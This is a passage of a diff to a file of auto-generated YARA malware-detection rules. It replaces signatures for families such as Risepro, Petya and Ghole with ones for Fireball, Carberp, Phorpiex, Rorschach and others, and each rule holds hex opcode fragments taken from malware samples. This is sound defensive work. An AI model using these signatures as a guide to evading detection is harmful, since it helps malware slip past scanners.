-		id = "dda5214f-af54-5ca2-a7cc-1bcc410f868f"
+		id = "56483242-91cf-583e-a311-f81ca06ce35e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.risepro_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fireball_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d29313e60d544119ebfa72aa2a82b5ab903014cb2fa565cd9721952588d526d1"
+		logic_hash = "c7846c89fcbe1ab5b4465cca84b35feb748c18b2402533bbb31c4b86c78dbc99"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83130,32 +83445,32 @@ rule MALPEDIA_Win_Risepro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb695e4feffff 52 0fb685e3feffff 50 0fb68de2feffff }
-		$sequence_1 = { 0fb655ff 52 8b450c 50 8b4d08 51 8b4df8 }
-		$sequence_2 = { eb0d 6a64 ff15???????? e9???????? 8b4df4 }
-		$sequence_3 = { e8???????? 50 ba0f000000 8b4dbc e8???????? 8945d4 8b4dd8 }
-		$sequence_4 = { 8b049500ef4100 f644082801 7422 8d4508 8975f8 8945f4 8d4dff }
-		$sequence_5 = { 8b4dd8 e8???????? 8b45f4 8b4df8 8908 eb27 8b5514 }
-		$sequence_6 = { 8d5584 52 8d4dbc e8???????? 8b00 89459c 8d4d80 }
-		$sequence_7 = { 8b4d0c e8???????? 8b4dfc e8???????? 8b45fc 8be5 5d }
-		$sequence_8 = { 6a00 8d4b08 e8???????? 33c9 884db7 }
-		$sequence_9 = { 8945dc 8b4d08 e8???????? 8bd0 8d4de7 e8???????? }
+		$sequence_0 = { 57 c785b8f6ffff40000000 ff15???????? 85c0 7410 8d45a8 }
+		$sequence_1 = { 83e61f c1e606 033485000a2500 837e0800 }
+		$sequence_2 = { 8d8d04f7ffff e8???????? 8d8dd4f6ffff e8???????? 8d8d88f6ffff e8???????? }
+		$sequence_3 = { e9???????? 8d8d38f5ffff e9???????? 8d8da0f6ffff e9???????? 8d8d80f5ffff e9???????? }
+		$sequence_4 = { 83c404 8b4c2470 64890d00000000 59 5e }
+		$sequence_5 = { 0f4275e8 85f6 0f8598000000 33c0 85c0 7514 }
+		$sequence_6 = { e8???????? 59 59 8b7d08 833cfda8f5240000 755b 6a18 }
+		$sequence_7 = { 51 6af6 ff15???????? 8b04bd000a2500 }
+		$sequence_8 = { 59 8365fc00 8b049d000a2500 f644380401 7413 ff7510 ff750c }
+		$sequence_9 = { 0f94c0 5d c3 56 33f6 ffb6c8f62400 }
 
 	condition:
-		7 of them and filesize < 280576
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Ghole_Auto : FILE
+rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e862057-2c23-515e-8722-3cd2a9153bb9"
+		id = "f92134ff-d8ee-58cb-8cb8-468d7205306f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghole_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isr_stealer_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7b940f8a5e148214fddbb5db105fb5b0301dfcf2c7e2cf8b7ad48df7aac652b0"
+		logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83169,33 +83484,33 @@ rule MALPEDIA_Win_Ghole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d5002 48 8bcd e8???????? 48 85c0 48 }
-		$sequence_1 = { 48 8b45d0 48 8b4038 48 8945e8 48 }
-		$sequence_2 = { 89c7 e8???????? 48 8d45d0 be10000000 48 89c7 }
-		$sequence_3 = { 85c0 7422 48 8d85d0feffff ba00000000 be00000000 48 }
-		$sequence_4 = { 837df007 750a b800000000 e9???????? 48 8b45e8 }
-		$sequence_5 = { 4c 896c2450 48 8bd8 4c 8bee 7458 }
-		$sequence_6 = { 8b45e4 48 98 48 0345e8 c60000 }
-		$sequence_7 = { 48 8d3d324b0100 e8???????? b800000000 e9???????? 48 8b05???????? }
-		$sequence_8 = { 48 83c608 668b147b 48 8d1c7b 6685d2 759b }
-		$sequence_9 = { 897de8 48 8975e0 8955dc 48 894dd0 4c }
+		$sequence_0 = { fb b05e 2bc1 e8???????? 661e }
+		$sequence_1 = { 08ac22c115978d 0e e8???????? 07 }
+		$sequence_2 = { 1c8b 53 2456 2bd1 807e6543 }
+		$sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 }
+		$sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? }
+		$sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d }
+		$sequence_6 = { 07 fb b05e 2bc1 e8???????? }
+		$sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e }
+		$sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? }
+		$sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Bhunt_Auto : FILE
+rule MALPEDIA_Win_Carberp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "29e82532-7a8f-57df-9bb4-9a79fe2adcb0"
+		id = "0a8c5eae-e871-515f-938c-f71747cf4ace"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bhunt_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carberp_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a7325d2f342b2d438ae4157b93fee930a25dcbfe35ec458ac01a26d195b6e98d"
-		score = 50
+		logic_hash = "7591c0ae0d97018ab7f451ed94881b2aa3238758f2aeec163b32e54490fa5153"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -83208,32 +83523,32 @@ rule MALPEDIA_Win_Bhunt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4510 50 8d75e0 895d10 e8???????? 8b4508 40 }
-		$sequence_1 = { 81c19a343e57 f5 c1c903 3be2 f7c43b003f6a 85cd 0fc9 }
-		$sequence_2 = { f8 33c3 48 c1c003 80fb62 2d89703a21 f7c6fc739c51 }
-		$sequence_3 = { 0bee 236c2414 23fe 0bef 036c2450 895c241c }
-		$sequence_4 = { 8b5604 f9 f7d1 f5 f7c727065338 6685eb f7d2 }
-		$sequence_5 = { 8bc1 c1f805 8bf1 8d3c8500e04900 8b07 83e61f c1e606 }
-		$sequence_6 = { 8bd3 0fbcc2 c1e202 80eca7 8bc5 f5 663bd7 }
-		$sequence_7 = { ff7304 8b45fc ff30 8d7be4 e8???????? 59 59 }
-		$sequence_8 = { ff5070 8bb7a4060000 68???????? e8???????? 83f8ff 7543 391d???????? }
-		$sequence_9 = { c1e21c 33db c1ef04 0bd8 8b04cd68fa4400 0bd7 8bfa }
+		$sequence_0 = { ff7704 e8???????? 8bf0 59 59 3bf3 0f8492000000 }
+		$sequence_1 = { 7504 0fb611 41 33f6 8ac2 2c30 3c09 }
+		$sequence_2 = { c645eb73 c645ec2e c645ed70 c645ee6c c645ef75 c645f067 c645f100 }
+		$sequence_3 = { 0f8565010000 57 56 e8???????? 59 53 be80000000 }
+		$sequence_4 = { 59 8975fc 3bf7 7507 32c0 e9???????? 53 }
+		$sequence_5 = { ff750c e8???????? ff7510 8d4e24 ff750c e8???????? 5e }
+		$sequence_6 = { 59 84c0 7526 57 68???????? 8d4e1c 897df0 }
+		$sequence_7 = { 55 8b6c2428 56 57 8bf8 8b442434 49 }
+		$sequence_8 = { ff742410 6a03 6a00 50 e8???????? 83c414 }
+		$sequence_9 = { ff75fc e8???????? 59 385d0f 0f843c010000 e8???????? 84c0 }
 
 	condition:
-		7 of them and filesize < 19161088
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Bs2005_Auto : FILE
+rule MALPEDIA_Win_Ismdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7ab1e13-ba2d-5cc6-b498-29127d7b94b4"
+		id = "83a6746f-b3b5-5b57-a445-904bcf5ea3d8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bs2005_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ismdoor_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "9437688f1e9a849259370cda11e68d8a858bd8cd17b5169c95f49dad03ad5566"
+		logic_hash = "b2a8beb2bbf9a7e436997cbc54636f7d3af94cae5a6618f143e6a6f5f28950e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83247,32 +83562,37 @@ rule MALPEDIA_Win_Bs2005_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f 5e 5b 5d c20400 bf???????? 33db }
-		$sequence_1 = { 8b804c000400 50 898748060000 ff15???????? }
-		$sequence_2 = { 8d59bf 81e6ff000000 83c8ff 80fb19 7708 0fbec1 }
-		$sequence_3 = { ff15???????? 85c0 7420 8b8544fbffff 50 ff15???????? 32c0 }
-		$sequence_4 = { 55 8bec 803d????????00 53 56 57 747b }
-		$sequence_5 = { c3 8bff 55 8bec 8b4508 33c9 3b04cda0304100 }
-		$sequence_6 = { 8bf8 57 8d8e1c010c00 51 83c241 }
-		$sequence_7 = { 81c154010400 8bc1 8d7001 8d4900 }
-		$sequence_8 = { 83c408 85ff 7452 8b7704 85f6 743a 8b06 }
-		$sequence_9 = { ffd3 8b7df0 8b4dfc 83c410 }
+		$sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 }
+		$sequence_1 = { 488b15???????? e8???????? 488b3d???????? 488d5fe0 }
+		$sequence_2 = { 747e 4883f8ff 7606 4883c9ff }
+		$sequence_3 = { 4889450f 48837e1808 7205 488b16 }
+		$sequence_4 = { 8bce 83e11f 41b901000000 41d3e1 448bc6 49c1e805 }
+		$sequence_5 = { 488bfb 488bde 4885f6 75d7 }
+		$sequence_6 = { 7512 488d9550010000 488b4d90 e8???????? eb02 ffcb }
+		$sequence_7 = { 4c8d8d10020000 4c8bc7 488bd0 488d8d70010000 }
+		$sequence_8 = { 837dc000 0f8414010000 83ec18 c745e800000000 }
+		$sequence_9 = { 8d4dd8 c745fc00000000 e8???????? 8d4508 c645fc01 50 }
+		$sequence_10 = { c645fc34 50 ba???????? 8d8dd4feffff e8???????? }
+		$sequence_11 = { 8bf8 8d85f4fdffff 50 56 }
+		$sequence_12 = { c6458300 8b4dc8 85c9 7409 }
+		$sequence_13 = { 8b45ec 8b75cc 3bc6 7557 8b36 }
+		$sequence_14 = { c785a8feffff00000000 c68598feffff00 83bd3cffffff10 720e ffb528ffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1933312
 }
-rule MALPEDIA_Win_Deathransom_Auto : FILE
+rule MALPEDIA_Win_Mariposa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a114591a-b780-5a40-a9ea-b0c6b9cb905d"
+		id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deathransom_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mariposa_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "51420be8374b7a80642a50bf14b9acdb6936ed5b62767040db7c66a1d7ee7900"
+		logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83286,34 +83606,34 @@ rule MALPEDIA_Win_Deathransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7508 4e 83e804 85f6 7ff3 5f }
-		$sequence_1 = { 2345e8 8b5dd8 0bd8 03d9 8b4d88 8bd1 895dd8 }
-		$sequence_2 = { 03ca 8d5601 3bcf 8bc1 0f42d6 8b75e0 2bc7 }
-		$sequence_3 = { c1e803 33c8 8b5df8 03d1 8bc7 0355c8 8bcf }
-		$sequence_4 = { 8d8d90fdffff e8???????? 6a50 8d8590fdffff 50 8d8578feffff 50 }
-		$sequence_5 = { 035594 8bc7 c1c807 33c8 8bc7 c1e803 33c8 }
-		$sequence_6 = { 81c2fc6d2c4d 03d0 8b45ec 8bc8 03da c1c00a c1c90d }
-		$sequence_7 = { 6880000000 8d8538ffffff 50 ffd1 808d38ffffffc0 8d8538ffffff 804db701 }
-		$sequence_8 = { 57 894df8 c745fc00000000 8975f0 895d0c 8b02 8bfe }
-		$sequence_9 = { 0fafc3 2bf8 8d87ffff0000 8945fc 3bc1 720a }
+		$sequence_0 = { 55 8bec 53 56 bb???????? 43 }
+		$sequence_1 = { ffd3 33c0 50 e8???????? 33c0 }
+		$sequence_2 = { 53 56 bb???????? 43 }
+		$sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b }
+		$sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 }
+		$sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 }
+		$sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 }
+		$sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e }
+		$sequence_8 = { 53 56 bb???????? 43 803b00 }
+		$sequence_9 = { 03da 4b 54 ffd3 33c0 }
 
 	condition:
-		7 of them and filesize < 133120
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Dubrute_Auto : FILE
+rule MALPEDIA_Win_Phorpiex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68b59ace-0878-598c-a753-f65c82412bdf"
+		id = "93126ddf-7d23-57a9-b11d-b555411adf12"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dubrute_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phorpiex_auto.yar#L1-L281"
 		license_url = "N/A"
-		logic_hash = "17213bc1a7d95fe150fe5455d2618ba3abfef4592455b4788ecd90ee42a9b6b1"
+		logic_hash = "ecdba64c76b9c6ee0e76612106be4a9e4db8b2914c6804e0ef9feb32643b1afb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83325,32 +83645,52 @@ rule MALPEDIA_Win_Dubrute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d3489 c1e603 8bc6 034744 8b5020 85d2 }
-		$sequence_1 = { 51 53 56 33f6 57 39750c ff7518 }
-		$sequence_2 = { ff36 834df0ff 8975f4 895df8 68???????? e8???????? 59 }
-		$sequence_3 = { e8???????? 83c410 6a02 58 eb96 8b460c 85c0 }
-		$sequence_4 = { 8b06 c1e908 8808 ff06 8b06 8bcb c1e908 }
-		$sequence_5 = { 8a4601 c1e008 0bc2 0fb65603 c1e008 0bc2 eb0c }
-		$sequence_6 = { 85c0 59 0f84a8000000 8b4d0c 8906 034604 3b4df4 }
-		$sequence_7 = { 8d45a4 8d4d0c 50 ffd6 8b35???????? 8d4514 6a01 }
-		$sequence_8 = { a1???????? 8d4e20 ff30 8d4720 53 50 ff15???????? }
-		$sequence_9 = { eb09 8b4304 89450c 8d450c 8b08 8b4508 5f }
+		$sequence_0 = { ff15???????? 85c0 740f 6a07 }
+		$sequence_1 = { 6a00 ff15???????? ff15???????? 50 e8???????? }
+		$sequence_2 = { ff15???????? 85c0 741f 6880000000 }
+		$sequence_3 = { 6a20 6a00 6a00 6a00 8b5508 }
+		$sequence_4 = { 83c410 6a00 6a02 6a02 6a00 6a00 }
+		$sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 }
+		$sequence_6 = { e8???????? 99 b90d000000 f7f9 }
+		$sequence_7 = { e8???????? 83c404 e8???????? e8???????? ff15???????? 6a00 }
+		$sequence_8 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 }
+		$sequence_9 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? }
+		$sequence_10 = { 6a00 682a800000 6a00 ff15???????? }
+		$sequence_11 = { ff15???????? 6a00 ff15???????? 85c0 7418 ff15???????? }
+		$sequence_12 = { 6a01 ff15???????? ff15???????? b001 }
+		$sequence_13 = { f7f9 81c210270000 52 e8???????? }
+		$sequence_14 = { 52 e8???????? 83c418 eb04 }
+		$sequence_15 = { 68???????? ff15???????? e9???????? 8d45fc }
+		$sequence_16 = { ff15???????? 8945f8 837df800 7429 8b45f8 50 }
+		$sequence_17 = { ff15???????? 8945fc 837dfc00 7416 8b4df8 51 ff15???????? }
+		$sequence_18 = { 50 e8???????? 59 59 85c0 0f85c0000000 }
+		$sequence_19 = { 3d00010000 7504 83c8ff c3 8b542404 }
+		$sequence_20 = { 3db7000000 7508 6a00 ff15???????? 6804010000 }
+		$sequence_21 = { 6a21 50 e8???????? c60000 }
+		$sequence_22 = { 52 e8???????? 99 b960ea0000 f7f9 }
+		$sequence_23 = { 85c0 746b 8b9424b8000000 8a8414a8000000 8d9414a8000000 84c0 }
+		$sequence_24 = { 50 68???????? 8d4c2468 68ff010000 51 e8???????? 6a40 }
+		$sequence_25 = { 81ec20010000 56 57 6a00 6a00 6a03 6a00 }
+		$sequence_26 = { 40 41 663bc2 72f7 53 33c0 }
+		$sequence_27 = { 50 8d45ec 50 6805000020 }
+		$sequence_28 = { 56 57 68e8030000 ff15???????? e8???????? be???????? }
+		$sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 2490368
 }
-rule MALPEDIA_Win_Turian_Auto : FILE
+rule MALPEDIA_Win_Acehash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "762c542d-5fa6-5b48-a3af-f444b4ed2d2f"
+		id = "c02dd1c8-b3e7-50ce-a7de-221cfd645c47"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turian_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acehash_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "64a5758bdf29fcbe94dd0cd69166b022a26376fc8e3a37014e6d93a76d08b3ce"
+		logic_hash = "000cf5b63c50e8cdae527d807554d2033db615c3997c132b3125d4523298d8fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83364,32 +83704,32 @@ rule MALPEDIA_Win_Turian_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 85f6 7405 83c605 }
-		$sequence_1 = { 5b 81c420040000 c3 8d4c2410 6a10 51 }
-		$sequence_2 = { 50 53 52 ff15???????? eb1b }
-		$sequence_3 = { bf???????? f3a5 668b15???????? 52 }
-		$sequence_4 = { 56 c1e105 03c8 57 8b7c2410 }
-		$sequence_5 = { 83c9ff 33c0 668b15???????? f2ae }
-		$sequence_6 = { 81c49c000000 c3 6a00 6a00 8d4c2424 688c000000 51 }
-		$sequence_7 = { 0f8502010000 8b1d???????? 8b2d???????? 8d442410 50 e8???????? 83c404 }
-		$sequence_8 = { 6a16 8901 8bd5 56 894104 }
-		$sequence_9 = { 52 49 baff000000 68???????? 2bd1 }
+		$sequence_0 = { e8???????? 448b4630 488bd6 482b5738 4883c230 48c1fa02 482bd3 }
+		$sequence_1 = { 488d542420 488d4c2420 4d8bc4 e8???????? 0fb6442421 }
+		$sequence_2 = { 448955a7 438b8ca1a0e90300 43338ca9a0ed0300 43338c81a0ed0300 33ce 43338cb9a0e50300 43338cb1a0f10300 }
+		$sequence_3 = { 418bc1 4533460c c1e808 0fb6d0 418bc2 418bbc9770a10400 c1e810 }
+		$sequence_4 = { 4803d0 8d45fa 4863c8 483bd1 7224 4c8d4c2430 }
+		$sequence_5 = { 25003f0000 418bc8 83e13f 8913 4181e000f00300 c1e104 }
+		$sequence_6 = { 4883ec20 488bd9 e8???????? 488d050b8d0300 488903 488bc3 4883c420 }
+		$sequence_7 = { 0fb6c0 45339c86a0c40300 4503cb 418bc1 48c1e810 0fb6d0 418bc1 }
+		$sequence_8 = { 4c8d2d54051000 413bc0 7554 486303 4869c0b0000000 4e8b542870 4d85d2 }
+		$sequence_9 = { c3 4053 4883ec20 488bd9 488d4c2430 ba02000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 645120
+		7 of them and filesize < 2318336
 }
-rule MALPEDIA_Win_Crenufs_Auto : FILE
+rule MALPEDIA_Win_Rorschach_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afe43d9c-690f-5ee9-b954-c5b702959ff3"
+		id = "11b24b2d-bfea-5a8c-988f-bea7ea32170c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crenufs_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rorschach_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3c7a04525acb3eb4c11e5514f2c9651e3b51e0f4081d21b17236ba959340440d"
+		logic_hash = "3819d2826273a95ad95ce552fb76b197f4eb30ddd0b4d089208f0442591f4b17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83403,32 +83743,32 @@ rule MALPEDIA_Win_Crenufs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4dac 53 51 ff75ec }
-		$sequence_1 = { 8d442410 6a00 50 8d4e10 6a04 51 52 }
-		$sequence_2 = { 85c0 751b 3b742414 741b 0fbe4eff 4e 57 }
-		$sequence_3 = { 800d????????01 53 8bce a2???????? ff15???????? 68???????? }
-		$sequence_4 = { 57 50 ffd5 8b0f 41 51 e8???????? }
-		$sequence_5 = { 3beb 0f84fd010000 8b44244c 8b4d00 3bc8 7408 }
-		$sequence_6 = { 8dbe1a040000 57 ff7604 ff15???????? }
-		$sequence_7 = { f3aa 8b4e58 8b565c 8d442414 50 8b4304 51 }
-		$sequence_8 = { 8a450b 56 57 6a00 }
-		$sequence_9 = { 52 50 ffd5 8b4338 85c0 7505 897338 }
+		$sequence_0 = { f30f6f440420 f30f6f0c28 660fefc8 f30f7f0c30 418d40f0 f30f6f440420 f30f6f0c28 }
+		$sequence_1 = { e8???????? 8885f6050000 b261 488d8d70050000 e8???????? 8885f7050000 33d2 }
+		$sequence_2 = { ff15???????? 85c0 7414 488b4c2438 4c8d442444 488d5570 ff15???????? }
+		$sequence_3 = { eb04 33c0 8bd8 b978110000 e8???????? 488bf8 48894540 }
+		$sequence_4 = { 488d4d28 e8???????? 884529 33d2 488d4d28 e8???????? 88452a }
+		$sequence_5 = { 488d8d00010000 e8???????? 88850f010000 33d2 488d8d00010000 e8???????? 888510010000 }
+		$sequence_6 = { e8???????? 488d8598070000 488985b80c0000 c6454069 b273 488d4d40 e8???????? }
+		$sequence_7 = { 48897820 488b05???????? 4833c4 488985f0020000 bae9030000 ff15???????? 488bf0 }
+		$sequence_8 = { e8???????? 8885d7060000 33d2 488d8dd0060000 e8???????? 8885d8060000 b26b }
+		$sequence_9 = { 8885f60b0000 b23c 488d8d300b0000 e8???????? 8885f70b0000 33d2 488d8d300b0000 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 3921930
 }
-rule MALPEDIA_Win_Petya_Auto : FILE
+rule MALPEDIA_Win_Knot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96d15d70-0cad-5ba8-b732-d7e2c6c8a3c4"
+		id = "ea865775-0235-55b7-9748-11331945e645"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.petya_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.knot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "126f559636a52e8bbed5a94164c0b2da83f722a29115c2b51cd7bbb82a77ed47"
+		logic_hash = "735c3c37008eab248d62841c5d72cf7bb3dbc84598bc674db47efd96b8fa6a3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83442,34 +83782,34 @@ rule MALPEDIA_Win_Petya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c7 53 50 e8???????? 83c40c 8d5750 }
-		$sequence_1 = { 75f5 46 3bf2 53 0f42f2 6a04 56 }
-		$sequence_2 = { 0f42f2 6a04 56 e8???????? 8bd8 }
-		$sequence_3 = { 8b4c2420 33fe 8bf0 33da 0facc80e 33d2 c1e612 }
-		$sequence_4 = { a1???????? 85c0 743a 53 56 8b35???????? 33c9 }
-		$sequence_5 = { c1e017 33ff 0bf9 c1eb09 8b4c2424 }
-		$sequence_6 = { c1eb09 0bd8 8b44241c 8bf0 0facc812 c1e60e }
-		$sequence_7 = { 8bf8 85f6 7505 e8???????? 8bc7 5f }
-		$sequence_8 = { 33d2 0facc812 0bd0 c1e912 0bf1 }
-		$sequence_9 = { 6a00 50 e8???????? ff7618 8d857cfeffff }
+		$sequence_0 = { e8???????? 83c408 85c0 7407 c685f3fdffff00 ebbe }
+		$sequence_1 = { 32c0 e9???????? 8b4508 50 68???????? 8d8de0fdffff 51 }
+		$sequence_2 = { 50 e8???????? 83c408 68???????? 8b8d74f7ffff }
+		$sequence_3 = { 51 8b95ecfdffff 52 8b45fc 50 }
+		$sequence_4 = { 8b148d58504000 52 8b8598fbffff 50 e8???????? 83c408 85c0 }
+		$sequence_5 = { 6a00 6a00 6a00 6a02 6a00 8b55e8 52 }
+		$sequence_6 = { 747b 6a00 6a00 6a00 }
+		$sequence_7 = { e9???????? 8d95f4fdffff 52 8d8580f7ffff }
+		$sequence_8 = { 7507 32c0 e9???????? c785d8fdffff00000000 8d85d8fdffff 50 6a00 }
+		$sequence_9 = { 6880000000 6a02 6a00 6a00 6800000040 8d95e0fdffff 52 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 59392
 }
-rule MALPEDIA_Win_Zerocleare_Auto : FILE
+rule MALPEDIA_Win_Zeus_Auto : FILE
 {
 	meta:
